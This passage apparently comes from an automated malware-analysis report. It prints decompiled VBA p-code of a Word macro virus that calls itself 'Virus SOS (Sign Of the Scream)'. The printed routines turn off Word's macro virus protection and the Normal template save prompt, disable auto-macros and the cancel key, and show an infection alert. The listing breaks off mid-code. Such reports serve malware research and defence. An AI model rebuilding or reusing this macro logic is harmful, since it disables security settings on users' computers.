' 	MemSt SaveNormalPrompt 
' Line #142:
' 	OnError ErrorTMa 
' Line #143:
' 	LitStr 0x002E "Attention, votre ordinateur contient le SOS..."
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x0020 "Your computer contain the SOS..."
' 	Concat 
' 	Ld vbCritical 
' 	LitStr 0x001E "Virus SOS (Sign Of the Scream)"
' 	ArgsCall MsgBox 0x0003 
' Line #144:
' 	Label ErrorTMa 
' Line #145:
' 	EndSub 
' Line #146:
' 	FuncDefn (Sub ViewVBCode())
' Line #147:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #148:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #149:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #150:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #151:
' 	OnError ErrorVVBC 
' Line #152:
' 	Ld MVB 
' 	ArgsMemCall Show 0x0000 
' Line #153:
' 	Label ErrorVVBC 
' Line #154:
' 	EndSub 
' Macros/VBA/HA - 3763 bytes
' Line #0:
' 	FuncDefn (Private Sub userform_initialize())
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	EndSub 
' Line #6:
' 	FuncDefn (Private Sub CommandButton1_Click())
' Line #7:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #8:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #9:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #10:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #11:
' 	Ld HA 
' 	ArgsCall Unlock 0x0001 
' Line #12:
…

Open this report in the interactive analyzer, or submit your own file for analysis.